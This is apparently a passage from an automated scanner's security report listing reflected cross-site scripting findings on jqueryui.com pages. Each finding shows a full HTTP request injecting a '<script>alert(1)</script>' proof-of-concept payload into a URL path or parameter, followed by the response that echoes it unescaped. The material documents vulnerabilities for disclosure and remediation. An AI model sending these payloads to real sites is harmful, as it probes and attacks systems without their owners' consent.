This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /docs/Gitc1b27</script><script>alert(1)</script>acb8bbcb22c HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27129

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Gitc1b27</script><script>alert(1)</script>acb8bbcb22c</title>

   <meta name="keywords" content="jquery,use
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Gitc1b27</script><script>alert(1)</script>acb8bbcb22c]").addClass("selected");
</script>
...[SNIP]...

1.53. http://jqueryui.com/docs/Git [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Git

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 325b5</title><script>alert(1)</script>2996e1b9954 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Git325b5</title><script>alert(1)</script>2996e1b9954 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27126

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Git325b5</title><script>alert(1)</script>2996e1b9954</title>

   <meta name="keywords" content="jquery,user
...[SNIP]...

1.54. http://jqueryui.com/docs/Theming [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Theming

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ca81</script><script>alert(1)</script>174ea7c0154 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /docs/Theming8ca81</script><script>alert(1)</script>174ea7c0154 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27141

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Theming8ca81</script><script>alert(1)</script>174ea7c0154</title>

   <meta name="keywords" content="jquery
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Theming8ca81</script><script>alert(1)</script>174ea7c0154]").addClass("selected");
</script>
...[SNIP]...

1.55. http://jqueryui.com/docs/Theming [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Theming

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload e8b94</title><script>alert(1)</script>cf2988328a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Theminge8b94</title><script>alert(1)</script>cf2988328a4 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27138

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Theminge8b94</title><script>alert(1)</script>cf2988328a4</title>

   <meta name="keywords" content="jquery,
...[SNIP]...

1.56. http://jqueryui.com/docs/Theming/API [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Theming/API

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 4cda6</title><script>alert(1)</script>2f586665f1b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Theming4cda6</title><script>alert(1)</script>2f586665f1b/API HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27150

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Theming4cda6</title><script>alert(1)</script>2f586665f1b/API</title>

   <meta name="keywords" content="jqu
...[SNIP]...

1.57. http://jqueryui.com/docs/Theming/API [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Theming/API

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ceab9</script><script>alert(1)</script>49513c3cd2c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /docs/Themingceab9</script><script>alert(1)</script>49513c3cd2c/API HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27153

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Themingceab9</script><script>alert(1)</script>49513c3cd2c/API</title>

   <meta name="keywords" content="jq
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Themingceab9</script><script>alert(1)</script>49513c3cd2c/API]").addClass("selected");
</script>
...[SNIP]...

1.58. http://jqueryui.com/docs/Theming/API [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Theming/API

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 91557</title><script>alert(1)</script>02c61d91876 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Theming/API91557</title><script>alert(1)</script>02c61d91876 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27150

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Theming/API91557</title><script>alert(1)</script>02c61d91876</title>

   <meta name="keywords" content="jqu
...[SNIP]...

1.59. http://jqueryui.com/docs/Theming/API [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Theming/API

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54db8</script><script>alert(1)</script>9368d5de4a0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /docs/Theming/API54db8</script><script>alert(1)</script>9368d5de4a0 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27153

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Theming/API54db8</script><script>alert(1)</script>9368d5de4a0</title>

   <meta name="keywords" content="jq
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Theming/API54db8</script><script>alert(1)</script>9368d5de4a0]").addClass("selected");
</script>
...[SNIP]...

1.60. http://jqueryui.com/docs/Theming/ThemeSwitcher [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Theming/ThemeSwitcher

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6065</script><script>alert(1)</script>1b0f67c058 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /docs/Themingf6065</script><script>alert(1)</script>1b0f67c058/ThemeSwitcher HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27180

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Themingf6065</script><script>alert(1)</script>1b0f67c058/ThemeSwitcher</title>

   <meta name="keywords" co
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Themingf6065</script><script>alert(1)</script>1b0f67c058/ThemeSwitcher]").addClass("selected");
</script>
...[SNIP]...

1.61. http://jqueryui.com/docs/Theming/ThemeSwitcher [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Theming/ThemeSwitcher

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 101b8</title><script>alert(1)</script>6252d69be12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Theming101b8</title><script>alert(1)</script>6252d69be12/ThemeSwitcher HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27180

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Theming101b8</title><script>alert(1)</script>6252d69be12/ThemeSwitcher</title>

   <meta name="keywords" co
...[SNIP]...

1.62. http://jqueryui.com/docs/Theming/ThemeSwitcher [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Theming/ThemeSwitcher

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8461c</script><script>alert(1)</script>f779f290738 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /docs/Theming/ThemeSwitcher8461c</script><script>alert(1)</script>f779f290738 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27183

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Theming/ThemeSwitcher8461c</script><script>alert(1)</script>f779f290738</title>

   <meta name="keywords" c
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Theming/ThemeSwitcher8461c</script><script>alert(1)</script>f779f290738]").addClass("selected");
</script>
...[SNIP]...

1.63. http://jqueryui.com/docs/Theming/ThemeSwitcher [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Theming/ThemeSwitcher

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 3d88e</title><script>alert(1)</script>b52ee0bbbb4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Theming/ThemeSwitcher3d88e</title><script>alert(1)</script>b52ee0bbbb4 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27180

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Theming/ThemeSwitcher3d88e</title><script>alert(1)</script>b52ee0bbbb4</title>

   <meta name="keywords" co
...[SNIP]...

1.64. http://jqueryui.com/docs/Theming/Themeroller [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Theming/Themeroller

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82616</script><script>alert(1)</script>a7dc3dd4a3c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /docs/Theming82616</script><script>alert(1)</script>a7dc3dd4a3c/Themeroller HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27177

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Theming82616</script><script>alert(1)</script>a7dc3dd4a3c/Themeroller</title>

   <meta name="keywords" con
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Theming82616</script><script>alert(1)</script>a7dc3dd4a3c/Themeroller]").addClass("selected");
</script>
...[SNIP]...

1.65. http://jqueryui.com/docs/Theming/Themeroller [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Theming/Themeroller

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 7efef</title><script>alert(1)</script>19810303b4b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Theming7efef</title><script>alert(1)</script>19810303b4b/Themeroller HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27174

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Theming7efef</title><script>alert(1)</script>19810303b4b/Themeroller</title>

   <meta name="keywords" cont
...[SNIP]...

1.66. http://jqueryui.com/docs/Theming/Themeroller [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Theming/Themeroller

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cce2</script><script>alert(1)</script>ff24c95c7da was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /docs/Theming/Themeroller2cce2</script><script>alert(1)</script>ff24c95c7da HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27177

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Theming/Themeroller2cce2</script><script>alert(1)</script>ff24c95c7da</title>

   <meta name="keywords" con
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Theming/Themeroller2cce2</script><script>alert(1)</script>ff24c95c7da]").addClass("selected");
</script>
...[SNIP]...

1.67. http://jqueryui.com/docs/Theming/Themeroller [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Theming/Themeroller

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 7c80b</title><script>alert(1)</script>996164f01b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Theming/Themeroller7c80b</title><script>alert(1)</script>996164f01b7 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27174

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Theming/Themeroller7c80b</title><script>alert(1)</script>996164f01b7</title>

   <meta name="keywords" cont
...[SNIP]...

1.68. http://jqueryui.com/docs/Upgrade_Guide [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Upgrade_Guide

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3a55</script><script>alert(1)</script>a48fc76bd21 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /docs/Upgrade_Guideb3a55</script><script>alert(1)</script>a48fc76bd21 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27159

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Upgrade_Guideb3a55</script><script>alert(1)</script>a48fc76bd21</title>

   <meta name="keywords" content="
...[SNIP]...
<script type="text/javascript">
   $(".demos-nav dd a[href$=Upgrade_Guideb3a55</script><script>alert(1)</script>a48fc76bd21]").addClass("selected");
</script>
...[SNIP]...

1.69. http://jqueryui.com/docs/Upgrade_Guide [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/docs/Upgrade_Guide

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload acebc</title><script>alert(1)</script>d6cc8634230 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /docs/Upgrade_Guideacebc</title><script>alert(1)</script>d6cc8634230 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 27156

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Documentation: UI/Upgrade_Guideacebc</title><script>alert(1)</script>d6cc8634230</title>

   <meta name="keywords" content="j
...[SNIP]...

1.70. http://jqueryui.com/download [themeParams parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/download

Issue detail

The value of the themeParams request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11a61"><script>alert(1)</script>a61e63b8ca1 was submitted in the themeParams parameter. This input was echoed as 11a61\"><script>alert(1)</script>a61e63b8ca1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /download?themeParams=%3Fctl%3Dthemeroller11a61"><script>alert(1)</script>a61e63b8ca1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 67839

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Configure your download</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" /
...[SNIP]...
<option value="?ctl=themeroller11a61\"><script>alert(1)</script>a61e63b8ca1" selected="selected">
...[SNIP]...

1.71. http://jqueryui.com/themeroller/ [bgColorActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9ef1"><script>alert(1)</script>786f28ee864 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9b9ef1"><script>alert(1)</script>786f28ee864&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopSh